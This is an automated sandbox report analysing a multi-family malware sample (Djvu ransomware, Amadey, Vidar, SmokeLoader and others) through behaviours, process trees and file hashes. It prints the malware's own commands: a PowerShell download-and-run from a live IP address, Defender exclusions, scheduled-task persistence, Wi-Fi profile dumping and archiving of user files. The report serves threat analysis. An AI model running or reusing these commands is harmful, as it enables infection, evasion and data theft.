Malware Analysis Report

2025-01-02 11:07

Sample ID 240315-bfn63acg6y
Target 66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029
SHA256 66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029
Tags
amadey dcrat djvu smokeloader vidar 82df9629d6ef6fc7fe54d6eb2bc6137b pub1 backdoor discovery evasion infostealer persistence ransomware rat spyware stealer trojan lumma stealc zgrat
score
10/10

Analysis Overview

SHA256

66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029

Threat Level: Known bad

The file 66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029 was found to be: Known bad.

Malicious Activity Summary

Suspicious use of NtCreateUserProcessOtherParentProcess

Amadey

Stealc

Djvu Ransomware

SmokeLoader

Detect Vidar Stealer

Lumma Stealer

ZGRat

Vidar

DcRat

Detected Djvu ransomware

Detect ZGRat V1

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Downloads MZ/PE file

Reads user/profile data of web browsers

Modifies file permissions

Deletes itself

Checks BIOS information in registry

Loads dropped DLL

Reads data files stored by FTP clients

Identifies Wine through registry keys

Drops startup file

Reads WinSCP keys stored on the system

Executes dropped EXE

Reads local data of messenger clients

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Checks installed software on the system

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

Modifies registry class

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Modifies system certificate store

Uses Task Scheduler COM API

Checks processor information in registry

Creates scheduled task(s)

Runs ping.exe

Suspicious use of WriteProcessMemory

Analysis: static1

Detonation Overview

Reported

2024-03-15 01:05

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-15 01:05

Reported

2024-03-15 01:10

Platform

win7-20240221-en

Max time kernel

299s

Max time network

300s

Command Line

"C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ba5a0f87-fa9b-4d62-a767-f7bd38b1c9cc\\7DA9.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8410.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BE25.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31C0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3BCF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\cfdfjwb N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31C0.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ba5a0f87-fa9b-4d62-a767-f7bd38b1c9cc\\7DA9.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\7DA9.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\blyat.dll = "rundll32 C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005011\\blyat.dll, Main" C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explorgu.job C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\AppData\Local\Temp\31C0.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cfdfjwb N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cfdfjwb N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cfdfjwb N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\cfdfjwb N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2C15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31C0.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1200 wrote to memory of 2660 N/A N/A C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1200 wrote to memory of 2564 N/A N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2564 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2748 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Windows\SysWOW64\icacls.exe
PID 2748 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\Temp\7DA9.exe
PID 2204 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 2544 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe
PID 1408 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2204 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7DA9.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe
PID 876 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe

Processes

C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe

"C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\67E7.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\ba5a0f87-fa9b-4d62-a767-f7bd38b1c9cc" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

"C:\Users\Admin\AppData\Local\Temp\7DA9.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

"C:\Users\Admin\AppData\Local\Temp\7DA9.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

"C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe"

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

"C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 1444

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe

"C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe"

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe

"C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {303F32D4-477B-4968-ABCA-175CE614C246} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\Temp\8410.exe

C:\Users\Admin\AppData\Local\Temp\8410.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 124

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\93AB.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\BE25.exe

C:\Users\Admin\AppData\Local\Temp\BE25.exe

C:\Users\Admin\AppData\Local\Temp\2C15.exe

C:\Users\Admin\AppData\Local\Temp\2C15.exe

C:\Users\Admin\AppData\Local\Temp\31C0.exe

C:\Users\Admin\AppData\Local\Temp\31C0.exe

C:\Users\Admin\AppData\Local\Temp\3BCF.exe

C:\Users\Admin\AppData\Local\Temp\3BCF.exe

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll, Main

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\452737119395_Desktop.zip' -CompressionLevel Optimal

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command "Invoke-WebRequest -Uri 'http://193.222.96.225/server/website2014523652458952/blue/Gcode_Secure/Gcode.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'; Start-Process 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\cfdfjwb

C:\Users\Admin\AppData\Roaming\cfdfjwb

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

Network

Files


\Users\Admin\AppData\Local\Temp\7DA9.exe

MD5 888dba3eb73cebb3e00be574e3144939
SHA1 e894bb88de481dcfc825ef5b50a67359e55e580e
SHA256 9c3865fc42fbbdee0c3d0737ffe90fbe6124ddcb923058e4477d23c36791d842
SHA512 5eaa429ead18d080020b5922b4d0ac9e42f37645858211e7ed9d22f85c1dfa24dd9b9d2c78a90f2511951c0c7aa43909464dd1f0a3be4b70af7d13f76b9790b6

memory/2684-68-0x00000000002F0000-0x0000000000382000-memory.dmp

memory/2204-70-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2204-69-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

MD5 7f3a7543ba3f646faefdfa53e992f0f5
SHA1 16c64a6aa1f9fe4241ef45c5b18cdb0f2defd52f
SHA256 0dbed298832d877424aa20f1c02f84b970e70175b53cca062aa378dac799d365
SHA512 ae3f9d7ea889d8da4751783a1b628d3822a3ade17e0b8dabf2fd9ad913758da67b45d4c9543cb0208776df97f06ab260231b6b66a09d1cc719ca3b479d8e0df2

memory/2684-61-0x00000000002F0000-0x0000000000382000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab92AE.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b41fc6f54520417703e9d78eeb8b6c7b
SHA1 11aa1fa43a92b0d3944d70b21b1078cfaf64a1ac
SHA256 3ba37b3a7914cb8f93d5d4a90ed0967f7e982d00c2b1cc3f274e59594ba89986
SHA512 ca3598daddbd69001fb006e14bb82f879f33cdfb38cf4502553db3e1c11cfdff8d62755d13f49aeeac360a3354d7cb65f6fcf8bc40fb71c5d0caa410523ab4c5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 25199c60dcdc7972a2d352c99cce3685
SHA1 75af0af164ad2b16e7ba0f1ae60b4693dcfed0f5
SHA256 52accd23d7d0dbfc5a4babf518a0cc1683222b8d263409db1e0da6bc10e24745
SHA512 fd84637af78de62ca78e5aa1cc63b54e7380728a0b710cd911524e766d3e1f7fc54b6e02de6bea08a54203bbc1090065ea5937c71780363cacf267aacf662c33

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 d67fa48cf6cf5f1818b732ea24db1d6e
SHA1 44858909775b98c384307149a53b231f084427f6
SHA256 1dd5acc0e95a7e0a6eea0ce7e4ab2665c928db84a241f4006a06791343b84d27
SHA512 c89132c4ac4a3e34e37ba33d98347af7c6a0394eceafb043cfd99e5d41d68575287cc537831a3f42924c975f7716aa0c531c6f619fac2df1c17daca658b926a6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 bf6d1d1725a23dcff97c3f8acc82db92
SHA1 beb5b513f2ec01fb21438af59c4336ed34259532
SHA256 7c864c384fc9097c02b931fb4821219781444047217074de800469d4fdf4d7c7
SHA512 cde72cfdae79a1e566741856fbedc6126d9e10731ac894624d5e540d6dba19c6e7f53bb35416d101f51ffcd835f47a8a95528a0d80439c71a77cc9b7cbda4c86

memory/2204-84-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2204-83-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2204-91-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2204-90-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2204-88-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 4e462b81647b8453ef9333923a1d5c6e
SHA1 7e2b0bf2cfa009c834b4d65762d72f10f4f46cda
SHA256 7966cb5c8492ba3e2d928a4bf22c22ac5c18fc8cdcf49a24fd978421a89aac23
SHA512 78e6b7b95ace3af77a003cf6c2fe6d59923597c2d4f95ec384692e1917ceb024e7c43530d4b6b73dec2e2288c08652000b2269eccdab69677b93f249e60af50e

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 07dbdb1159e2d3194d4d1fdbdfbd70a4
SHA1 d2045cf8120cc0398480fde884f90661eebeb402
SHA256 b608217134cdf3c0eaf17beb1056f91ea570712031e9a3bc3e4bda215f92a658
SHA512 3e0e326b6c77e5d87031c5ff07c593d37e84d6395e47d97d1efcf0458e59491686e7fbb790dfc6250d132ac35070550ea4e0c176d75e2eebc26a2a9446c8e8b2

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 adf12397a33e4db95a4915c32dd7b50f
SHA1 cef0e7bcbf6eb34430db2980ed6a6a5083338abe
SHA256 4cd220ed31a2d01fc233e2c9fdecb3cb71e84a964f35b4a391b2846bdfe2ef1c
SHA512 089497c137c7ad9fddf0ea6949ff173548c5d1549e8f7d2455075855347ae54991b81b03970c66837eabf67c62ea5d391f80c917ce6682d32129dfade476e2dc

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 0878b0bec8b7515b064c1a28b2984a28
SHA1 f2d7876c21e444fed9c9b10a3aa1d0be436763d9
SHA256 c18b0333139e1f4dd15f4d5f253ed08c6bd43e5bd2d52d425a1a7cc08714390a
SHA512 1c8479f351560705b09593a86601179b2d8ded1a9b46bf60e866176d65bdef77d321d815ec60b3f481710d8d93b436b139af1bb31466cc2c143e4ed823cb9551

memory/1408-105-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 22451f90d55f6a6e95fa91bfb832dd4c
SHA1 403071b6198f9620d095600142497e77801ae33a
SHA256 511160abdccc9c9c4105d66c2e8181c5610a352785befa1f4d7ce765323c71ad
SHA512 ccaa02d26087492d8dd7c81bd93c5907b16b94aac2dcbbff4770ee4b0ae5b79b9083803ba1f976deec5939041a6d0ee73d9fd30ec0754ad7d4b9d0258547362c

memory/2544-110-0x00000000007A0000-0x00000000008A0000-memory.dmp

memory/1408-112-0x0000000000400000-0x0000000000644000-memory.dmp

memory/2204-113-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1408-114-0x0000000000400000-0x0000000000644000-memory.dmp

memory/2544-111-0x00000000002B0000-0x00000000002E1000-memory.dmp

memory/1408-107-0x0000000000400000-0x0000000000644000-memory.dmp

C:\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 5a01802387dc6601d14c72e7abc06496
SHA1 7950375263ed7acaa89ed0e5454950307f0c128b
SHA256 e0cc16355942b00537f7b4ce2570c9a749628466ac2ad17bc635af16018f54db
SHA512 67c96ac953fb54a5d6fb46679eed10ddf2ec8cb724b3eec602f09fbfc9d913c17f8b258d12fbf9cb241d9f3d774089936315d38e523fd65c5bab5fff769e2a56

C:\Users\Admin\AppData\Local\Temp\TarA851.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarA951.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 f15bcc17ed2ca868c8a12de5fe15d202
SHA1 f3204ef68a365b3e7ed652ba57c3635a4ad986f2
SHA256 58432e52a5421ff02090c881e00f5acb785a326dcc3295413bddc41cd2ff7c88
